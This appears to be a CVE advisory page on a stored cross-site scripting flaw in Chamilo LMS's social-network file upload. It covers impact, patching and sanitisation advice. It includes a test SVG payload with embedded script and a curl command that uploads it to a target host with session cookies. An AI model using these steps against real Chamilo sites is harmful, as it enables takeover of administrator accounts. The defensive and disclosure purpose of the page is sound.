Chamilo LMS, Stored XSS, CVE-2025-55208 (High)

Listen to this Post

CVE-2025-55208 is a Stored Cross-Site Scripting (XSS) vulnerability found in Chamilo LMS versions prior to 1.11.34. The vulnerability resides in the file upload functionality of the “Social Networks” feature. Due to improper validation and sanitization of uploaded files, a low-privileged authenticated user can upload a file containing malicious JavaScript code. This file is stored on the server. When an administrator accesses their inbox, which processes or displays this malicious file, the JavaScript code executes within the admin’s browser session. This allows the attacker to perform actions with the admin’s privileges, such as creating new admin accounts or modifying system settings, effectively leading to full account takeover and compromise of the entire Chamilo platform. The vulnerability is rated High due to its low attack complexity and high impact on confidentiality, integrity, and availability. The issue is resolved in version 1.11.34 by implementing proper file validation and output encoding .
Platform: Chamilo LMS
Version: < 1.11.34
Vulnerability: Stored XSS
Severity: High
Date: 05/03/2026

Prediction: Patch available

What Undercode Say:

Analytics:

The vulnerability allows for account takeover due to insecure file handling. Below are commands and concepts related to identifying and testing for such vulnerabilities.

Example: Check current Chamilo version via command line (if accessible)
This command reads the version file from a typical Chamilo installation.
cat /var/www/chamilo/main/inc/conf/configuration.php | grep "'system_version'"
Example: Find potentially uploaded malicious files in the social network's upload directory.
Look for files with script extensions or embedded scripts.
find /var/www/chamilo/app/upload/social/ -type f -name ".php" -o -name ".js" -o -name ".svg" | xargs grep -l "<script"
Example: A simple test payload for file upload XSS.
Create a file named xss.svg with the following content:
echo '<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">alert("XSS")</script>
</svg>

' > xss.svg
Example: Using curl to simulate an authenticated file upload (conceptual).
curl -X POST -F "[email protected]" -F "submit=Upload" -b "cookies.txt" "http://target.com/main/social/upload.php"

How Exploit:

An attacker with low-privilege access uploads a malicious file (e.g., an SVG or HTML file containing JavaScript) to their social network profile. When an admin views the social feed or inbox, the file is rendered, and the script executes, granting the attacker admin-level control.

Protection:

  1. Upgrade: Immediately update Chamilo LMS to version 1.11.34 or later .
  2. Input Validation: Implement strict file type validation based on content (MIME type) rather than extension.
  3. Sanitization: Sanitize file names and content, removing any executable scripts or HTML tags.
  4. Output Encoding: Encode all user-supplied data before displaying it in the browser.

Impact:

  • Account Takeover: Attackers can gain full control of administrator accounts .
  • Arbitrary Code Execution: Malicious scripts can be executed in the context of the admin user .
  • System Compromise: With admin access, the attacker can modify the LMS, access sensitive data, and potentially pivot to the server.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top